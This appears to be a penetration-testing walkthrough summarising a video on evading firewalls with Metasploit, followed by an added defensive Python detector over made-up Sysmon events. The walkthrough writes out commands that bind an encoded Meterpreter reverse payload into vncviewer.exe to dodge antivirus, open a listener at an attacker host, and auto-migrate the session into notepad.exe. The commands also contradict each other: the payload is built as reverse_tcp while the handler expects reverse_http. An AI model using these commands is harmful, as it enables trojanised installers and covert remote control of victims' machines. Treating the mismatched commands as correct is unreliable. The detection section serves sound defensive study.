Premise
In this video walkthrough, we used advanced Metasploit scripts that run automatically once a session is started. We used AutoRunScript to migrate to another process as soon as the connection comes in, and we used HTTP payloads so that the connection blends in with legitimate HTTP traffic.
Skills Learned
- Metasploit
- Windows Firewall
- Firewall Evasion
The Challenge: Firewalls
One of the biggest hurdles in penetration testing is the firewall. Most corporate networks are configured to block incoming connections on the common ports that Metasploit uses. However, they almost always allow traffic on port 80, which is used for web browsing. I’m going to leverage this to my advantage by using an HTTP reverse payload. This type of payload communicates over port 80, making it look like normal web traffic and allowing it to slip past the firewall.
Creating the Payload
To create my payload, I’ll use a tool called MSFvenom. I’m going to create a payload that is specifically designed for a Windows machine. I’ll also use an encoder to help it evade some basic antivirus detection.
To make the payload look less suspicious, I’m going to bind it to a legitimate Windows application, in this case, VNC Viewer. This means that when the user runs the VNC Viewer application, my payload will also run in the background.
Setting Up the Listener
Next, I’ll set up a listener in the Metasploit console. This listener will wait for the payload to connect back to my machine. I’ll use the exploit/multi/handler module and configure it to use the same HTTP reverse payload that I created earlier.
The Secret to Persistence: AutoRunScript
Here’s where things get interesting. What happens if the user closes the VNC Viewer application? Normally, this would kill my connection. But I’m going to use a neat trick to make sure my session stays alive.
I’m going to use the AutoRunScript option in Metasploit to automatically migrate my Meterpreter session to a different process as soon as a connection is established. In this case, I’ll migrate the session to notepad.exe. This means that even if the user closes VNC Viewer, my connection will remain active through the Notepad process.
The Demonstration
Now, let’s see this in action. I’ll send the payload to the victim machine and wait for the user to run it. As soon as they do, I’ll get a connection. Then, I’ll have the user close the VNC Viewer application. You’ll see that my session doesn’t die. Instead, it seamlessly migrates to the notepad.exe process, and I’m still in control. This is a powerful technique for maintaining a persistent connection on a target machine.
Technical Commands Used
Here are the key commands I used in this demonstration:
- Creating the payload with msfvenom:
  msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<your_client_ip> LPORT=8080 -f exe -e xor_dynamic -i 9 -x vncviewer.exe -o vncviewer_payload.exe
- Launching the Metasploit console:
  msfconsole
- Setting up the multi-handler in msfconsole:
  use exploit/multi/handler
  set payload windows/meterpreter/reverse_http
  set lhost <your_client_ip>
  set lport 8080
  show options
- Setting the AutoRunScript for process migration:
  set autorunscript migrate -f
- Executing the exploit:
  exploit
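From the defender's side, the two behaviours this walkthrough relies on (the session migrating into notepad.exe, and the C2 channel then beaconing from that process) leave traces in endpoint telemetry. The following Python is an added example, not from the video or from Metasploit: it runs a small correlation over constructed Sysmon-style events and flags remote-thread creation, outbound connections from a binary such as notepad.exe that never needs the network, and a destination port that reappears from the process that was injected into. The field names, paths and PIDs are simplified assumptions, not real captured data.

```python
import ntpath

# Constructed Sysmon-style events (not from the page): EID 1 = ProcessCreate,
# EID 3 = NetworkConnect, EID 8 = CreateRemoteThread. Paths and PIDs are made up
# and the field names are simplified from the real Sysmon schema.
SAMPLE_EVENTS = [
    {"eid": 1, "pid": 4412, "ppid": 1100,
     "image": r"C:\Users\alice\Downloads\vncviewer_payload.exe"},
    {"eid": 3, "pid": 4412, "dport": 8080,
     "image": r"C:\Users\alice\Downloads\vncviewer_payload.exe"},
    {"eid": 1, "pid": 5120, "ppid": 4412, "image": r"C:\Windows\System32\notepad.exe"},
    {"eid": 8, "source_pid": 4412, "target_pid": 5120,
     "source_image": r"C:\Users\alice\Downloads\vncviewer_payload.exe",
     "target_image": r"C:\Windows\System32\notepad.exe"},
    {"eid": 3, "pid": 5120, "dport": 8080, "image": r"C:\Windows\System32\notepad.exe"},
    {"eid": 3, "pid": 2200, "dport": 80,
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe"},
]

# Windows binaries that have no legitimate reason to open outbound sockets.
NO_NETWORK_BINARIES = {"notepad.exe", "calc.exe", "mspaint.exe", "wordpad.exe"}


def find_migration_indicators(events):
    """Return (rule, detail) tuples for events that look like a migrated C2 session."""
    hits = []
    injected = {}  # target pid -> pid that created a remote thread in it (EID 8)
    talked = {}    # pid -> destination ports already seen for that pid (EID 3)
    for ev in events:
        if ev["eid"] == 8:
            src = ntpath.basename(ev["source_image"]).lower()
            tgt = ntpath.basename(ev["target_image"]).lower()
            injected[ev["target_pid"]] = ev["source_pid"]
            hits.append(("remote_thread",
                         f"{src} ({ev['source_pid']}) -> {tgt} ({ev['target_pid']})"))
        elif ev["eid"] == 3:
            name = ntpath.basename(ev["image"]).lower()
            if name in NO_NETWORK_BINARIES:
                hits.append(("network_from_non_network_binary",
                             f"{name} -> port {ev['dport']}"))
            # The injected-into process reuses a port its injector already used:
            # the channel followed the session into its new host process.
            src_pid = injected.get(ev["pid"])
            if src_pid is not None and ev["dport"] in talked.get(src_pid, set()):
                hits.append(("session_followed_migration",
                             f"pid {src_pid} -> pid {ev['pid']} on port {ev['dport']}"))
            talked.setdefault(ev["pid"], set()).add(ev["dport"])
    return hits


if __name__ == "__main__":
    for rule, detail in find_migration_indicators(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

A browser talking on port 80 produces no hit, which is the point: the signal is which process beacons and how it came to exist, not the port alone.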